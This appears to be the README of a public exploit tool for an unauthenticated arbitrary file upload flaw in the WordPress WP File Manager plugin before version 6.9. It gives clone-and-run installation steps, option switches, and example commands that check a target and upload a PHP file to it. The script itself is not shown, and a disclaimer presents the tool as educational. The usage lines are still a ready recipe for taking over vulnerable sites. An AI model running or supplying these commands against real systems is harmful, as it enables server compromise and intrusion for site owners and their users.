## https://sploitus.com/exploit?id=B44EB02E-60FC-530E-A12D-62AFD2E4EB8F
## **WP File Manager Expoit**
*WP-file-manager wordpress plugin (<6.9) vulnerable to unauthenticated arbitary file upload resulting in full compromise of the system.*
### *Disclaimer*
*I haven't discovered this vulnerability & neither taking any credits of this CVE. I have only created the exploit after analyzing the description available on various blogs like* **[wordfence](https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/)**, **[seravo](https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/)** *with the motto to let the readers understand how to create POC by just analyzing the description of the vulnerability.*
*I am not responsible for any damage caused to an organization using this exploit & I would advice the readers not to exploit this vulnerability without written consent from the organization as it may expose the organization open to attacks by other hackers.*
### *Installation*
`git clone https://github.com/ALIF101XL/wpFileManagerExploit.git`
`chmod +x wpFileManagerExploit.sh`
### *Swtitches*
```
-u|--wp_url Wordpress target url
-f|--upload_file Absolute location of local file to upload on the target.
-k|--check Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.
-v|--verbose Also prints curl command which is going to be executed
-h|--help Print Help menu
```
### *Usage*
```
./wpFileManagerExploit.sh --wp_url https://www.example.com/wordpress --check
./wpFileManagerExploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
```